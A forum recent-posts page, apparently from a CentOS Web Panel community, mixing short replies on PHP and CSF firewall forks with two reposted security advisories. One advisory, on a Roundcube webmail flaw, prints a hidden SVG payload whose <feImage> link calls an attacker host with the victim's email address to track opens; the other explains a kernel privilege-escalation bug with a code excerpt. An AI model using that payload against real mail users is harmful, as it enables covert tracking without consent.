Recent Posts

Pages: 1 2 [3] 4 5 ... 10

PHP / Re: how to install and configure relay extension for php-fpm83 in cwp

« Last post by overseer on February 10, 2026, 02:53:53 PM »

I would look at this guide as a model:
https://www.alphagnu.com/topic/614-how-to-add-custom-php-fpm-84-85-support-to-cwp-on-almalinux-9x/
(You could try to customize the build scripts/extension scripts for 8.3 using this method.)

PHP Selector / Re: Support for PHP 8.4

« Last post by Andrew C on February 10, 2026, 11:41:23 AM »

Hello,

When will the change logs be updated. Still showing 13/11/2024 ?

Thanks

PHP Selector / Re: Support for PHP 8.4

« Last post by cHAp on February 09, 2026, 10:45:06 PM »

Hello,

When will the major update be released?

E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens

« Last post by Starburst on February 09, 2026, 06:24:31 PM »

Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.

Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.

Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.

The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.

These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.

But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.

The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.

Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.

One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.

How Attackers Exploit It
Imagine receiving this malicious HTML in an email:

Code: [Select]

text<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>

It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.

No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.

CVE Details
Field   Value
CVE   CVE-2026-25916
Vendor   Roundcube
Product   Roundcube Webmail
Affected Versions   <1.5.13, <1.6.13
Disclosure Date   2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.

2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.

CentOS 9 Problems / New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root

« Last post by Starburst on February 09, 2026, 03:36:30 PM »

For those running CentOS Stream 9, this is a Major Vulnerability.

New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/

A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.

The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.

The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.

Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.

Code: [Select]

cstatic s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
            struct sk_buff **to_free)
{
    // ...
    if (q->buffer_used > q->buffer_limit) {                 // [1] Check buffer limit
        u32 dropped = 0;
        while (q->buffer_used > q->buffer_limit) {
            dropped++;
            cake_drop(sch, to_free);                        // [2] Packet is DROPPED here
        }
        b->drop_overlimit += dropped;
    }
    return NET_XMIT_SUCCESS;                                // [!] Returns SUCCESS anyway
}

Root Cause in CAKE Scheduler

The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.

The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.

Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.

CSF Firewall / Re: Should we update CSF to V15??

« Last post by kalybg on February 09, 2026, 07:38:42 AM »

OK .... Thank you

CSF Firewall / Re: Should we update CSF to V15??

« Last post by Starburst on February 06, 2026, 02:19:35 PM »

They are 2 sperate CSF forks.

Hence all the forks have different version numbers now, not a universal one.

Some could use the last CSF v15.00 code, call it CSF2 with v1.0

If you want to switch to the Sentinel fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.

But it's all personal preference at this time.